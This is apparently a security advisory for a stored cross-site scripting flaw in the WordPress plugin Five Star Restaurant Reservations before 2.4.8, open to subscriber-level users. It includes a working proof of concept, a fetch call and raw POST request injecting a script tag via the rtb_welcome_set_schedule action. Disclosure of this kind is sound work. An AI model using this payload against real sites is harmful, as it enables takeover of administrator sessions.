Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting

The plugin does not have capability and CSRF checks in the rtb_welcome_set_schedule AJAX action, allowing any authenticated users to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged in admins

PoC

As a subscriber: fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“rtb_welcome_set_schedule”, “schedule_open”: ‘{“\">”: {“weekdays”:{“wednesday”:“1”},“time”:{“start”:“1:45 AM”,“end”:“”}}}’}), “method”: “POST”, “credentials”: “include” }) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 316 Connection: close Cookie: [any authenticated user] action=rtb_welcome_set_schedule&schedule;_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D Then the XSS will be triggered in the plugin’s settings: https://example.com/wp-admin/admin.php?page=rtb-settings